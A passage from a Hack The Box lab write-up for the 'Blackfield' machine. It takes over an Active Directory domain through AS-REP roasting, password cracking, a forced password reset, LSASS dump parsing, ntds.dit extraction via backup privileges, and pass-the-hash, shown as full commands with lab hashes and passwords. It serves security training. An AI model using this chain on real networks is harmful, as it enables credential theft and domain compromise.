13:28:57Z) 135/tcp open msrpc Microsoft Windows RPC 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: BLACKFIELD.local0., Site: Default-First-Site-Name) 445/tcp open microsoft-ds? 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: BLACKFIELD.local0., Site: Default-First-Site-Name) 5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-server-header: Microsoft-HTTPAPI/2.0 |_http-title: Not Found Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: |_clock-skew: 6h59m54s | smb2-security-mode: | 3:1:1: |_ Message signing enabled and required | smb2-time: | date: 2024-06-28T13:29:00 |_ start_date: N/A Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 168.22 seconds</code></pre></div> <p>Open ports:</p> <ul> <li>53 (DNS)</li> <li>88 (Kerberos)</li> <li>135, 593 (MSRPC)</li> <li>389, 3268 (LDAP)</li> <li>445 (SMB)</li> <li>5985 (WinRM)</li> </ul> <p>Active Directory:</p> <ul> <li>domain: BLACKFIELD.local</li> <li>hostname: DC01</li> </ul> <p>Guest logon was enabled, and I was able to list shares with <code class="language-text">netexec</code>:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">┌──(kali㉿kali)-[~/Desktop/HTB/Blackfield] └─$ netexec smb 10.10.10.192 -u 'a' -p '' --shares SMB 10.10.10.192 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:BLACKFIELD.local) (signing:True) (SMBv1:False) SMB 10.10.10.192 445 DC01 [+] BLACKFIELD.local\a: (Guest) SMB 10.10.10.192 445 DC01 [*] Enumerated shares SMB 10.10.10.192 445 DC01 Share Permissions Remark SMB 10.10.10.192 445 DC01 ----- ----------- ------ SMB 10.10.10.192 445 DC01 ADMIN$ Remote Admin SMB 10.10.10.192 445 DC01 C$ Default share SMB 10.10.10.192 445 DC01 forensic Forensic / Audit share. SMB 10.10.10.192 445 DC01 IPC$ READ Remote IPC SMB 10.10.10.192 445 DC01 NETLOGON Logon server share SMB 10.10.10.192 445 DC01 profiles$ READ SMB 10.10.10.192 445 DC01 SYSVOL Logon server share</code></pre></div> <p>With read access on <code class="language-text">profiles$</code>, I used <code class="language-text">smbclient</code> to connect to the share which contained directories for various users:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">┌──(kali㉿kali)-[~/Desktop/HTB/Blackfield] └─$ smbclient -N //10.10.10.192/profiles$ Try "help" to get a list of possible commands. smb: \> ls . D 0 Wed Jun 3 12:47:12 2020 .. D 0 Wed Jun 3 12:47:12 2020 AAlleni D 0 Wed Jun 3 12:47:11 2020 ABarteski D 0 Wed Jun 3 12:47:11 2020 ABekesz D 0 Wed Jun 3 12:47:11 2020 ABenzies D 0 Wed Jun 3 12:47:11 2020 ABiemiller D 0 Wed Jun 3 12:47:11 2020 AChampken D 0 Wed Jun 3 12:47:11 &lt;...snip...> 5102079 blocks of size 4096. 1689584 blocks available</code></pre></div> <p>I copied the output from the <code class="language-text">profiles$</code> share above and extracted the usernames with <code class="language-text">awk</code> and wrote it into the file <code class="language-text">users</code>:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">┌──(kali㉿kali)-[~/Desktop/HTB/Blackfield] └─$ awk '{print $1}' profiles > users ┌──(kali㉿kali)-[~/Desktop/HTB/Blackfield] └─$ cat users AAlleni ABarteski ABekesz ABenzies ABiemiller AChampken &lt;...snip...></code></pre></div> <p>With a list of potential users, I ran an AS-REP roast attack with <code class="language-text">impacket-GetNPUsers</code> which resulted in the hash for the <code class="language-text">support</code> user:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">┌──(kali㉿kali)-[~/Desktop/HTB/Blackfield] └─$ impacket-GetNPUsers BLACKFIELD.LOCAL/ -dc-ip 10.10.10.192 -usersfile users Impacket v0.11.0 - Copyright 2023 Fortra [-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database) [-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database) [-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database) &lt;...snip...> $krb5asrep$23$support@BLACKFIELD.LOCAL:20d7ee67382f7515c0992278687c0704$20b3cc879553e156a6a1a716e2a42da06c9d3ce10b150d66a01f16592a47ae76b209df30f8849f2eeb6fcdb71f620c87417e27509e76c444903e3df522339ddc892706b3ef78923c46c9a731ca64023a0801aab125a304a658750e745ac48ce523db3122a82578621bdbcbbeac8803852f067b2b2cd3383a584161962c897b934da9616e82b30c156e96e1425435dddee83bec33e9f5128058f204b2918022120a97b54a2bae11464e887cdd2cc74a98ec719e9f270f4f07c101a78e98cb63f37c878e47d1b9a58d66e91ce9cfe8680128a924818531a0ab00edec9fc81dec09d2582d12a33509b98c709a2acf008fd6fa928703 &lt;...snip...> [-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database) [-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database) [-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database) </code></pre></div> <p>I copied the hash into a file (<code class="language-text">asrep_support</code>) and ran <code class="language-text">JtR</code> to crack the password:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">┌──(kali㉿kali)-[~/Desktop/HTB/Blackfield] └─$ john asrep_support --wordlist=/usr/share/wordlists/rockyou.txt Using default input encoding: UTF-8 Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 128/128 AVX 4x]) Will run 4 OpenMP threads Press 'q' or Ctrl-C to abort, almost any other key for status #00^BlackKnight ($krb5asrep$23$support@BLACKFIELD.LOCAL) 1g 0:00:00:13 DONE (2024-06-28 02:47) 0.07246g/s 1038Kp/s 1038Kc/s 1038KC/s #1ByNature..#*burberry#*1990 Use the "--show" option to display all of the cracked passwords reliably Session completed. </code></pre></div> <p>I confirmed that the credentials were valid:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">┌──(kali㉿kali)-[~/Desktop/HTB/Blackfield] └─$ netexec smb 10.10.10.192 -u 'support' -p '#00^BlackKnight' SMB 10.10.10.192 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:BLACKFIELD.local) (signing:True) (SMBv1:False) SMB 10.10.10.192 445 DC01 [+] BLACKFIELD.local\support:#00^BlackKnight </code></pre></div> <p>With valid credentials, I was able to collect BloodHound data with <code class="language-text">netexec</code>:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">┌──(kali㉿kali)-[~/Desktop/HTB/Blackfield] └─$ netexec ldap 10.10.10.192 -u 'support' -p '#00^BlackKnight' --bloodhound --collection All --dns-server 10.10.10.192 SMB 10.10.10.192 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:BLACKFIELD.local) (signing:True) (SMBv1:False) LDAP 10.10.10.192 389 DC01 [+] BLACKFIELD.local\support:#00^BlackKnight LDAP 10.10.10.192 389 DC01 Resolved collection methods: dcom, psremote, rdp, container, acl, objectprops, localadmin, group, session, trusts LDAP 10.10.10.192 389 DC01 Done in 00M 11S LDAP 10.10.10.192 389 DC01 Compressing output into /home/kali/.nxc/logs/DC01_10.10.10.192_2024-06-28_024847_bloodhound.zip</code></pre></div> <p>After uploading the data into BloodHound, viewing First Degree Object Control for <code class="language-text">support</code> showed that the user had ForceChangePassword permission on <code class="language-text">audit2020</code>:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 619px; " > <a class="gatsby-resp-image-link" href="/static/3fc7810872aa856fd82fa9d788b5ec88/98e8d/support-first-degree-object-control.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 33.54430379746836%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAHCAYAAAAIy204AAAACXBIWXMAAA7DAAAOwwHHb6hkAAABHklEQVR42o2Ry1LCMBSGu3ajjgtkp2zUQklbeqHXUOjNaaFAreiAK1fO+Ai++28arA7TLlx8k5zkP9/MSYSx4eMPj0NM2gnP6AzzB6ON8FuwBlmbQdEDiJoDUbVxL1t4UI4MJw5GmstzY+KDaLRTehSyC4l46M1vcOXewqcrBI8FklWFtHhGvHyCH+UwaARJcnC+7qFvDEDUtlSQ2AjEohje2Th7v8T+Y4p9/oZ4s0O2eeHCKC+50ApSLrz4uka/HEAmM5ApPRWaNEbMGpJlBb/I8fl6QJoUcMIcku7xsWvcRcbF6XrH1i2SokKYlYwtNDfkWS6U2ZsoVgDVnmNihRANVrO95i74+cmHMJrGem1ovWFzMdJdkPqnO4L/5RuYnun6cXvSLAAAAABJRU5ErkJggg=='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="support user First Degree Object Control" title="" src="/static/3fc7810872aa856fd82fa9d788b5ec88/98e8d/support-first-degree-object-control.png" srcset="/static/3fc7810872aa856fd82fa9d788b5ec88/dda05/support-first-degree-object-control.png 158w, /static/3fc7810872aa856fd82fa9d788b5ec88/679a3/support-first-degree-object-control.png 315w, /static/3fc7810872aa856fd82fa9d788b5ec88/98e8d/support-first-degree-object-control.png 619w" sizes="(max-width: 619px) 100vw, 619px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>Using the <code class="language-text">net</code> tool from the <code class="language-text">samba</code> suite, I changed the password of the <code class="language-text">audit2020</code> user:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">┌──(kali㉿kali)-[~/Desktop/HTB/Blackfield] └─$ net rpc password "audit2020" "P@ssw0rd" -U "BLACKFIELD.LOCAL"/"support"%"#00^BlackKnight" -S 10.10.10.192</code></pre></div> <p>Then, I was able to authenticate and list shares as <code class="language-text">audit2020</code> which provided read access on the <code class="language-text">forensic</code> share:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">┌──(kali㉿kali)-[~/Desktop/HTB/Blackfield] └─$ netexec smb 10.10.10.192 -u 'audit2020' -p 'P@ssw0rd' --shares SMB 10.10.10.192 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:BLACKFIELD.local) (signing:True) (SMBv1:False) SMB 10.10.10.192 445 DC01 [+] BLACKFIELD.local\audit2020:P@ssw0rd SMB 10.10.10.192 445 DC01 [*] Enumerated shares SMB 10.10.10.192 445 DC01 Share Permissions Remark SMB 10.10.10.192 445 DC01 ----- ----------- ------ SMB 10.10.10.192 445 DC01 ADMIN$ Remote Admin SMB 10.10.10.192 445 DC01 C$ Default share SMB 10.10.10.192 445 DC01 forensic READ Forensic / Audit share. SMB 10.10.10.192 445 DC01 IPC$ READ Remote IPC SMB 10.10.10.192 445 DC01 NETLOGON READ Logon server share SMB 10.10.10.192 445 DC01 profiles$ READ SMB 10.10.10.192 445 DC01 SYSVOL READ Logon server share</code></pre></div> <p>I downloaded the <code class="language-text">forensic</code> share using <code class="language-text">smbclient</code>:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">┌──(kali㉿kali)-[~/Desktop/HTB/Blackfield/forensic] └─$ smbclient //10.10.10.192/forensic -U audit2020 Password for [WORKGROUP\audit2020]: Try "help" to get a list of possible commands. smb: \> ls . D 0 Sun Feb 23 08:03:16 2020 .. D 0 Sun Feb 23 08:03:16 2020 commands_output D 0 Sun Feb 23 13:14:37 2020 memory_analysis D 0 Thu May 28 16:28:33 2020 tools D 0 Sun Feb 23 08:39:08 2020 5102079 blocks of size 4096. 1693525 blocks available smb: \> recurse on smb: \> prompt off smb: \> mget * &lt;...snip...></code></pre></div> <p><code class="language-text">lsass.zip</code> in the <code class="language-text">memory_analysis</code> directory seemed particularly interesting:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">┌──(kali㉿kali)-[~/…/HTB/Blackfield/forensic/memory_analysis] └─$ ls conhost.zip ismserv.zip ServerManager.zip taskhostw.zip ctfmon.zip lsass.zip sihost.zip winlogon.zip dfsrs.zip mmc.zip smartscreen.zip wlms.zip dllhost.zip RuntimeBroker.zip svchost.zip WmiPrvSE.zip</code></pre></div> <p>The ZIP contained an LSASS memory dump, <code class="language-text">lsass.DMP</code>:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">┌──(kali㉿kali)-[~/…/HTB/Blackfield/forensic/memory_analysis] └─$ unzip lsass.zip Archive: lsass.zip inflating: lsass.DMP</code></pre></div> <p>Running <code class="language-text">pypykatz</code> on <code class="language-text">lsass.DMP</code> revealed the NTLM hash for the <code class="language-text">svc_backup</code> user:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">┌──(kali㉿kali)-[~/…/HTB/Blackfield/forensic/memory_analysis] └─$ pypykatz lsa minidump lsass.DMP INFO:pypykatz:Parsing file lsass.DMP FILE: ======== lsass.DMP ======= == LogonSession == authentication_id 406458 (633ba) session_id 2 username svc_backup domainname BLACKFIELD logon_server DC01 logon_time 2020-02-23T18:00:03.423728+00:00 sid S-1-5-21-4194615774-2175524697-3563712290-1413 luid 406458 == MSV == Username: svc_backup Domain: BLACKFIELD LM: NA NT: 9658d1d1dcd9250115e2205d9f48400d SHA1: 463c13a9a31fc3252c68ba0a44f0221626a33e5c DPAPI: a03cd8e9d30171f3cfe8caad92fef621 == WDIGEST [633ba]== username svc_backup domainname BLACKFIELD password None password (hex) == Kerberos == Username: svc_backup Domain: BLACKFIELD.LOCAL == WDIGEST [633ba]== username svc_backup domainname BLACKFIELD password None password (hex) &lt;...snip...></code></pre></div> <p>Viewing First Degree Group Memberships for <code class="language-text">svc_backup</code> showed that the user was a member of the following groups:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/53fa905e3ee71dd16a00df64ad147a7a/97f2a/svc_backup-first-degree-group-memberships.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 61.39240506329114%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAMCAYAAABiDJ37AAAACXBIWXMAAA7DAAAOwwHHb6hkAAABiklEQVR42pVTTU/CQBTkf3jyYoIFoUC/S9lK6QdQihLQkBgTDoaj8egP8G+PswuUagLo4eXtbrfz3sybrd2ZAS5F0+ij0fOhdT0VumPxzFNnhzjcrZ0DalkDlbvePYz+CE6YwbvPUCxbzEOYQcKIYfjROcB+CXTLbmSOJo9IixVG0wWCOCfYBP0ohx9NuB7DFslpwLYZQiOFJoFddjNdrCGS2a5Ax1NFtO6RvlyfpCxBbnptVk2RE2g4fiBV0qGGqgizjJblKxaHfRWjVu3suqPhatvF++cXlutXdlYgIVVJN0wLRdcJx5ivdDhCUNuR0vcgkQKUFcxgBBHzhzRD/LbFavOB55cNktlSDaPJi2ogwzF1myrtfK6lfi6jbYuy0x+UW6ZAo+2irttq74iU3T0hna1olbC0SNPY0W+co1yC2ke7aHuAHm3hskNrEO+7OW21iz6U0dgPRHcEI0JW1CmFZBHy+z8Aq960aOAwm3M4c8R5DpHmGHBo0lpV2n8EPD7B3TM8rn9r+A0mPZMKsNLXLgAAAABJRU5ErkJggg=='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="svc_backup user First Degree Group Memberships" title="" src="/static/53fa905e3ee71dd16a00df64ad147a7a/50637/svc_backup-first-degree-group-memberships.png" srcset="/static/53fa905e3ee71dd16a00df64ad147a7a/dda05/svc_backup-first-degree-group-memberships.png 158w, /static/53fa905e3ee71dd16a00df64ad147a7a/679a3/svc_backup-first-degree-group-memberships.png 315w, /static/53fa905e3ee71dd16a00df64ad147a7a/50637/svc_backup-first-degree-group-memberships.png 630w, /static/53fa905e3ee71dd16a00df64ad147a7a/97f2a/svc_backup-first-degree-group-memberships.png 776w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>Since the user was a member of <code class="language-text">Remote Management Users</code>, I was able to log in over WinRM as <code class="language-text">svc_backup</code>:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">┌──(kali㉿kali)-[~/Desktop/HTB/Blackfield] └─$ evil-winrm -i 10.10.10.192 -u svc_backup -H 9658d1d1dcd9250115e2205d9f48400d Evil-WinRM shell v3.5 Info: Establishing connection to remote endpoint *Evil-WinRM* PS C:\Users\svc_backup\Documents> whoami blackfield\svc_backup *Evil-WinRM* PS C:\Users\svc_backup\Documents> cd ../desktop *Evil-WinRM* PS C:\Users\svc_backup\desktop> ls Directory: C:\Users\svc_backup\desktop Mode LastWriteTime Length Name ---- ------------- ------ ---- -a---- 2/28/2020 2:26 PM 32 user.txt</code></pre></div> <p><code class="language-text">svc_backup</code> was also a member of <code class="language-text">Backup Operators</code>, members of this group are granted the <code class="language-text">SeBackup</code> and <code class="language-text">SeRestore</code> privileges:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">*Evil-WinRM* PS C:\Users\svc_backup\desktop> whoami /priv PRIVILEGES INFORMATION ---------------------- Privilege Name Description State ============================= ============================== ======= SeMachineAccountPrivilege Add workstations to domain Enabled SeBackupPrivilege Back up files and directories Enabled SeRestorePrivilege Restore files and directories Enabled SeShutdownPrivilege Shut down the system Enabled SeChangeNotifyPrivilege Bypass traverse checking Enabled SeIncreaseWorkingSetPrivilege Increase a process working set Enabled</code></pre></div> <p>Users with <code class="language-text">SeBackupPrivilege</code> can create a shadow copy of the entire drive, resulting in the ability to traverse any folder, list folder contents, and copy any file even if the user doesn't have explicit permission to access that file. This can be leveraged to access the <code class="language-text">ntds.dit</code> database and the <code class="language-text">SYSTEM</code> registry hive which can then be copied locally and used with <code class="language-text">impacket-secretsdump</code> to retrieve NTLM hashes. In order to do this, I took the following steps:</p> <p>Commands issued via <code class="language-text">evil-winrm</code> are executed in the context of the <code class="language-text">wsmprovhost</code> process which is non-interactive, as shown below with the session ID (<code class="language-text">SI</code>) of <code class="language-text">0</code>:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">*Evil-WinRM* PS C:\Users\svc_backup\desktop> $PID 4948 *Evil-WinRM* PS C:\Users\svc_backup\desktop> get-process Handles NPM(K) PM(K) WS(K) CPU(s) Id SI ProcessName ------- ------ ----- ----- ------ -- -- ----------- &lt;...snip...> 1442 27 80116 96832 0.83 4948 0 wsmprovhost</code></pre></div> <p>Therefore, I couldn't enter commands into the <code class="language-text">diskshadow.exe</code> utility directly. However, <code class="language-text">diskshadow.exe</code> also supports running commands from a script file, allowing for non-interactive usage. So, I ran the following commands to create a script file (<code class="language-text">diskshadow.txt</code>) within <code class="language-text">C:\windows\temp</code>:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">*Evil-WinRM* PS C:\windows\temp> echo "set context persistent nowriters" | out-file ./diskshadow.txt -encoding ascii *Evil-WinRM* PS C:\windows\temp> echo "add volume c: alias temp" | out-file ./diskshadow.txt -encoding ascii -append *Evil-WinRM* PS C:\windows\temp> echo "create" | out-file ./diskshadow.txt -encoding ascii -append *Evil-WinRM* PS C:\windows\temp> echo "expose %temp% z:" | out-file ./diskshadow.txt -encoding ascii -append</code></pre></div> <p>I was then able to run <code class="language-text">diskshadow.exe</code> with the script file to create a shadow copy of the <code class="language-text">C</code> drive exposed as <code class="language-text">z</code>:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">*Evil-WinRM* PS C:\windows\temp> diskshadow.exe /s c:\windows\temp\diskshadow.txt Microsoft DiskShadow version 1.0 Copyright (C) 2013 Microsoft Corporation On computer: DC01, 6/28/2024 7:09:01 AM -> set context persistent nowriters -> add volume c: alias temp -> create Alias temp for shadow ID {10f767dc-c5bc-4780-b991-93d3fdd38db8} set as environment variable. Alias VSS_SHADOW_SET for shadow set ID {8698040c-d85a-4ef8-ba63-aef956fb0d07} set as environment variable. Querying all shadow copies with the shadow copy set ID {8698040c-d85a-4ef8-ba63-aef956fb0d07} * Shadow copy ID = {10f767dc-c5bc-4780-b991-93d3fdd38db8} %temp% - Shadow copy set: {8698040c-d85a-4ef8-ba63-aef956fb0d07} %VSS_SHADOW_SET% - Original count of shadow copies = 1 - Original volume name: \\?\Volume{6cd5140b-0000-0000-0000-602200000000}\ [C:\] - Creation time: 6/28/2024 7:09:02 AM - Shadow copy device name: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1 - Originating machine: DC01.BLACKFIELD.local - Service machine: DC01.BLACKFIELD.local - Not exposed - Provider ID: {b5946137-7b9f-4925-af80-51abd60b20d5} - Attributes: No_Auto_Release Persistent No_Writers Differential Number of shadow copies listed: 1 -> expose %temp% z: -> %temp% = {10f767dc-c5bc-4780-b991-93d3fdd38db8} The shadow copy was successfully exposed as z:\. -></code></pre></div> <p>Using <code class="language-text">robocopy</code>, I made a copy of <code class="language-text">ntds.dit</code> from <code class="language-text">z</code>:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">*Evil-WinRM* PS C:\windows\temp> robocopy /B z:\Windows\NTDS .\ntds ntds.dit ------------------------------------------------------------------------------- ROBOCOPY :: Robust File Copy for Windows ------------------------------------------------------------------------------- Started : Friday, June 28, 2024 7:15:37 AM Source : z:\Windows\NTDS\ Dest : C:\windows\temp\ntds\ Files : ntds.dit Options : /DCOPY:DA /COPY:DAT /B /R:1000000 /W:30 ------------------------------------------------------------------------------ New Dir 1 z:\Windows\NTDS\ New File 18.0 m ntds.dit &lt;...snip...> ------------------------------------------------------------------------------ Total Copied Skipped Mismatch FAILED Extras Dirs : 1 1 0 0 0 0 Files : 1 1 0 0 0 0 Bytes : 18.00 m 18.00 m 0 0 0 0 Times : 0:00:00 0:00:00 0:00:00 0:00:00 Speed : 109734697 Bytes/sec. Speed : 6279.069 MegaBytes/min. Ended : Friday, June 28, 2024 7:15:37 AM</code></pre></div> <p>I confirmed that <code class="language-text">ntds.dit</code> was successfully copied:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">*Evil-WinRM* PS C:\windows\temp> ls Directory: C:\windows\temp Mode LastWriteTime Length Name ---- ------------- ------ ---- d----- 6/28/2024 5:13 AM ntds -a---- 6/28/2024 7:09 AM 612 2024-06-28_7-09-02_DC01.cab -a---- 6/28/2024 7:08 AM 86 diskshadow.txt -a---- 6/28/2024 4:31 AM 213550 MpCmdRun.log -a---- 6/28/2024 4:02 AM 102 silconfig.log ------ 6/28/2024 4:01 AM 635537 vmware-vmsvc.log ------ 6/28/2024 4:02 AM 36594 vmware-vmusr.log -a---- 6/28/2024 4:01 AM 3264 vmware-vmvss.log *Evil-WinRM* PS C:\windows\temp> ls ntds Directory: C:\windows\temp\ntds Mode LastWriteTime Length Name ---- ------------- ------ ---- -a---- 6/28/2024 5:13 AM 18874368 ntds.dit</code></pre></div> <p>Being a member of <code class="language-text">Backup Operators</code> grants permission to use the <code class="language-text">reg</code> command to copy registry hives, so next I copied the <code class="language-text">SYSTEM</code> registry hive:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">*Evil-WinRM* PS C:\windows\temp> reg save HKLM\SYSTEM SYSTEM The operation completed successfully. *Evil-WinRM* PS C:\windows\temp> ls Directory: C:\windows\temp Mode LastWriteTime Length Name ---- ------------- ------ ---- d----- 6/28/2024 5:13 AM ntds -a---- 6/28/2024 7:09 AM 612 2024-06-28_7-09-02_DC01.cab -a---- 6/28/2024 7:08 AM 86 diskshadow.txt -a---- 6/28/2024 4:31 AM 213550 MpCmdRun.log -a---- 6/28/2024 4:02 AM 102 silconfig.log -a---- 6/28/2024 7:17 AM 17580032 SYSTEM ------ 6/28/2024 4:01 AM 635537 vmware-vmsvc.log ------ 6/28/2024 4:02 AM 36594 vmware-vmusr.log -a---- 6/28/2024 4:01 AM 3264 vmware-vmvss.log</code></pre></div> <p>I downloaded the <code class="language-text">ntds.dit</code> database and <code class="language-text">SYSTEM</code> registry hive:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">*Evil-WinRM* PS C:\windows\temp> download ntds/ntds.dit Info: Downloading C:\windows\temp\ntds/ntds.dit to ntds.dit Info: Download successful! *Evil-WinRM* PS C:\windows\temp> download SYSTEM Info: Downloading C:\windows\temp\SYSTEM to SYSTEM Info: Download successful!</code></pre></div> <p>I used <code class="language-text">impacket-secretsdump</code> with <code class="language-text">ntds.dit</code> and <code class="language-text">SYSTEM</code> to retrieve user NTLM hashes:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">┌──(kali㉿kali)-[~/Desktop/HTB/Blackfield] └─$ impacket-secretsdump -ntds ntds.dit -system SYSTEM LOCAL Impacket v0.11.0 - Copyright 2023 Fortra [*] Target system bootKey: 0x73d83e56de8961ca9f243e1a49638393 [*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash) [*] Searching for pekList, be patient [*] PEK # 0 found and decrypted: 35640a3fd5111b93cc50e3b4e255ff8c [*] Reading and decrypting hashes from ntds.dit Administrator:500:aad3b435b51404eeaad3b435b51404ee:184fb5e5178480be64824d4cd53b99ee::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: DC01$:1000:aad3b435b51404eeaad3b435b51404ee:2148deab0a0a302616f70b15e16042f9::: krbtgt:502:aad3b435b51404eeaad3b435b51404ee:d3c02561bba6ee4ad6cfd024ec8fda5d::: audit2020:1103:aad3b435b51404eeaad3b435b51404ee:600a406c2c1f2062eb9bb227bad654aa::: support:1104:aad3b435b51404eeaad3b435b51404ee:cead107bf11ebc28b3e6e90cde6de212::: BLACKFIELD.local\BLACKFIELD764430:1105:aad3b435b51404eeaad3b435b51404ee:a658dd0c98e7ac3f46cca81ed6762d1c::: BLACKFIELD.local\BLACKFIELD538365:1106:aad3b435b51404eeaad3b435b51404ee:a658dd0c98e7ac3f46cca81ed6762d1c::: BLACKFIELD.local\BLACKFIELD189208:1107:aad3b435b51404eeaad3b435b51404ee:a658dd0c98e7ac3f46cca81ed6762d1c::: BLACKFIELD.local\BLACKFIELD404458:1108:aad3b435b51404eeaad3b435b51404ee:a658dd0c98e7ac3f46cca81ed6762d1c::: BLACKFIELD.local\BLACKFIELD706381:1109:aad3b435b51404eeaad3b435b51404ee:a658dd0c98e7ac3f46cca81ed6762d1c::: &lt;...snip...></code></pre></div> <p>With the hash of the <code class="language-text">administrator</code>, I logged in over WinRM:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">┌──(kali㉿kali)-[~/Desktop/HTB/Blackfield] └─$ evil-winrm -i 10.10.10.192 -u administrator -H 184fb5e5178480be64824d4cd53b99ee Evil-WinRM shell v3.5 Info: Establishing connection to remote endpoint *Evil-WinRM* PS C:\Users\Administrator\Documents> whoami blackfield\administrator *Evil-WinRM* PS C:\Users\Administrator\Documents> cd ../desktop *Evil-WinRM* PS C:\Users\Administrator\desktop> ls Directory: C:\Users\Administrator\desktop Mode LastWriteTime Length Name ---- ------------- ------ ---- -a---- 2/28/2020 4:36 PM 447 notes.txt -a---- 11/5/2020 8:38 PM 32 root.txt</code></pre></div>https://mgarrity.com/hack-the-box-reel/https://mgarrity.com/hack-the-box-reel/Fri, 09 Feb 2024 00:00:00 GMT<p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/b23196d2b108d56f978206de4e013086/3b67f/reel.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 43.67088607594937%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAJCAYAAAAywQxIAAAACXBIWXMAAAsTAAALEwEAmpwYAAABBUlEQVR42p2Su0oDQRSG8wKJsJfZHclmN7syRDO7G1ELQZugD2CppUgeQBCLQG5iI2hlqgi2Vr6DT/Y5uylszLU4DGd+5uP/z5mKE7RZVK4pq6GphhlWoMveWVGVZbBqI8XfVbTtEGnOone3ARaPasbZsRczaeZ8dC8YGtiJjMt7d1OgbeLJQNGvaWbdZ76nT8yuxoztHFFXpb42cO4uI/MjJvKcl5t3fj5HvA2nDLwzcr9p9MXR/3VYLCLwWtzphP7XA6ev1/RG99wmEXW5b/QNI4tiIWHKkRszOEzpXWY87ikz02S7Gf5FTxGeomPFCNlaGnUlcO70ACfU7EQpjnEm1viHv8W2BAfoEP6qAAAAAElFTkSuQmCC'); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="Reel" title="" src="/static/b23196d2b108d56f978206de4e013086/50637/reel.png" srcset="/static/b23196d2b108d56f978206de4e013086/dda05/reel.png 158w, /static/b23196d2b108d56f978206de4e013086/679a3/reel.png 315w, /static/b23196d2b108d56f978206de4e013086/50637/reel.png 630w, /static/b23196d2b108d56f978206de4e013086/fddb0/reel.png 945w, /static/b23196d2b108d56f978206de4e013086/3b67f/reel.png 1232w" sizes="(max-width: 630px) 100vw, 630px" 